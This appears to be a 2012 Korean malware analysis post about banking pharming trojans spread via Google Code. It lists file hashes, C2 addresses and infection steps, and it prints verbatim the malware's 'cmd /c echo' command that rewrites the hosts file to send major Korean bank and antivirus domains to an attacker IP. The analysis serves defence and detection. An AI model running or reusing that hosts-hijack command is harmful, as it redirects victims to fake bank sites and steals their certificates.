국내 금융권에서 제공하는 인터넷뱅킹 서비스을 이용하는 사용자를 대상으로 악성코드 감염을 통해 파밍(Pharming) 공격을 시도하는 사례가 지속적으로 발견되고 있습니다.(※ 파밍(Pharming)은 악성코드에 감염된 PC를 이용하여 금융권 웹 사이트에 접속할 경우 가짜 금융 사이트로 자동으로 연결하여 금융 정보를 탈취하는 공격 기법을 의미합니다.)
▷ 가짜 공인 인증서를 이용한 국내 인터넷뱅킹 악성코드 유포 주의 (2012.6.11)
▷ 보안 취약점을 이용한 국내 인터넷뱅킹 악성코드 유포 주의 (2012.7.12)
▷ 웹하드 정상 설치 파일 변조를 통한 국내 인터넷뱅킹 악성코드 유포 주의 (2012.7.14)
이런 가운데 이번에는 구글(Google)에서 프로그래머(개발자)를 위한 오픈 소스 프로젝트 호스팅 서비스 구글 코드(Google Code)의 특정 계정에 등록된 악성 파일을 통해 유포가 이루어지고 있는 것을 확인하였습니다.
확인된 파일은 2012년 7월 16일 23시에 등록되어 610대 이상의 PC에서 다운로드가 이루어진 것으로 확인되고 있습니다.
- aax.exe (MD5 : bc55ed66c137cc820421bd2607517a5c) - AhnLab V3 : Dropper/Win32.Banki
다운로드된 aax.exe 파일은 WinRAR SFX 실행 압축으로 제작되어 있으며, 내부에는 ServiceInstall.exe, WindowsDirectx.exe 2개의 파일이 포함되어 있습니다.
C:\WINDOWS\system32\ServiceInstall.exe
- MD5 : e7af3712b81fbc861e1bdfb048e17fe2
- AhnLab V3 : ASD.Prevention
C:\WINDOWS\system32\WindowsDirectx.exe :: WindowsDirectx 서비스 등록 파일 / 메모리 상주 프로세스
- MD5 : 8d92927ee88ad969a7bcdc6808f12391
- AhnLab V3 : Trojan/Win32.Scar
사용자가 다운로드한 파일을 실행(※ 추정한 상황)할 경우, "WindowsDirectx" 서비스 항목을 등록하여 시스템 시작시 "C:\WINDOWS\system32\WindowsDirectx.exe" 파일을 자동으로 실행하여 메모리에 상주하도록 구성되어 있습니다.
이를 통해 WindowsDirectx.exe 파일은 일본(Japan)에 위치한 "211.18.251.140" 서버와 20초 주기로 연결을 시도합니다.
- h**p://dns01.**aaaa.com/74.exe (MD5 : MD5 : ee521d2a0b3f8f234e8181429fce4c61) - AhnLab V3 : Dropper/Win32.Banki
연결된 서버(dns01.**aaaa.com)에서는 CONFIU.txt 파일에 등록된 구성값을 참조하여 74.exe 파일을 다운로드하여 추가적인 감염이 이루어집니다.
참고로 추가로 다운로드된 74.exe 파일은 WinRAR SFX 실행 압축 형태로 내부에는 기존과 마찬가지로 CONFIG.INI, CretClient.exe, HDSetup.exe 3개의 파일이 포함되어 있습니다.
C:\Documents and Settings\LocalService\Local Settings\Temporary Internet Files\Content.IE5\(Random)\74[1].exe
- MD5 : ee521d2a0b3f8f234e8181429fce4c61
- AhnLab V3 : Dropper/Win32.Banki
C:\WINDOWS\CONFIG.INI
C:\WINDOWS\CretClient.exe
- MD5 : 835fbbe56ca431bac55cc17ff5db8a27
- AhnLab V3 : Trojan/Win32.Banki
C:\WINDOWS\HDSetup.exe
- MD5 : 0959913672d783f202292dcc494ea928
- AhnLab V3 : Trojan/Win32.Banki
C:\WINDOWS\system32\drivers\etc\hosts :: 파일 변경
C:\WINDOWS\Temp\74.exe
- MD5 : ee521d2a0b3f8f234e8181429fce4c61
- AhnLab V3 : Dropper/Win32.Banki
인터넷 임시 폴더에 다운로드된 파일은 윈도우 임시 폴더에 저장된 후 호스트 파일(C:\WINDOWS\system32\drivers\etc\hosts) 수정 및 파일 생성을 진행합니다.
1. C:\WINDOWS\CONFIG.INI
CONFIG.INI 파일에는 홍콩(HongKong)에 위치한 "59.188.237.74" 서버 정보를 포함하고 있습니다.
2. C:\WINDOWS\CretClient.exe
해당 파일은 사용자가 인터넷뱅킹을 위해 금융권 웹 사이트에 접속하여 공인인증서를 실행할 경우 가짜 공인인증서 창을 생성하여 인증서 탈취 및 정보 수집 기능을 가지고 있습니다.
3. C:\WINDOWS\HDSetup.exe
해당 파일은 Internet Explorer 웹 브라우저의 보안 설정을 변경하며, 감염된 환경에서는 Windows XP, Windows 7 운영 체제의 경우 인터넷 옵션의 "보안" 탭 영역 하단에 "일부 설정은 시스템 관리자에 의해 관리됩니다." 또는 "일부 설정은 시스템 관리자가 관리합니다."라고 노란바가 생성됩니다.
4. 호스트 파일(C:\WINDOWS\system32\drivers\etc\hosts) 변조
cmd /c echo 59.188.237.74 www.kbstar.com kbstar.com obank.kbstar.com banking.nonghyup.com banking.shinhan.com www.wooribank.com wooribank.compib.wooribank.com bank.keb.co.kr gms.ahnlab.com avs.nprotect2.net www.1.co.kr > C:\WINDOWS\system32\drivers\etc\hosts
감염 과정에 HDSetup.exe 프로세스는 "cmd /c echo" 명령어를 이용하여 호스트 파일을 변조하게 됩니다.
이를 통해 변조된 호스트 파일의 내용을 살펴보면 국민은행, 농협, 신한은행, 우리은행, 외환은행 이외에 AhnLab ASD 서버(gms.ahnlab.com)와 nProtect 서버(avs.nprotect2.net)가 포함되어 있는 것이 특징입니다.
이렇게 감염된 환경에서 사용자가 국민은행 웹 사이트에 접속을 시도할 경우 홍콩(HongKong)에 위치한 "59.188.237.74" 서버로 연결이 이루어지는 것을 확인할 수 있으며, 테스트 시점에서는 이미 해당 IP 서버는 차단되어 있는 것으로 확인되었습니다.
이번에 확인된 인터넷뱅킹 악성코드는 AhnLab V3 보안 제품을 통해 진단 및 치료가 가능하므로 참고하시기 바랍니다.
해당 공격자는 2012년 6월을 기점으로 포기하지 않고 지속적으로 변종을 제작하여 다양한 유포 경로를 통해 감염을 유발하고 있으며, 차단된 IP로 인해 국내에서 접속되지 않는 점에 대한 검증이 이루어지지 않았다는 점은 국외 거주자가 분명해 보입니다.
위와 같은 악성코드에 감염된 PC 환경에서는 최대한 인터넷 활동을 자제하고 보안 제품을 통한 치료를 하시거나 포맷을 통해 깨끗한 PC 환경을 유지하도록 하여 금전적 피해가 없도록 하시기 바랍니다.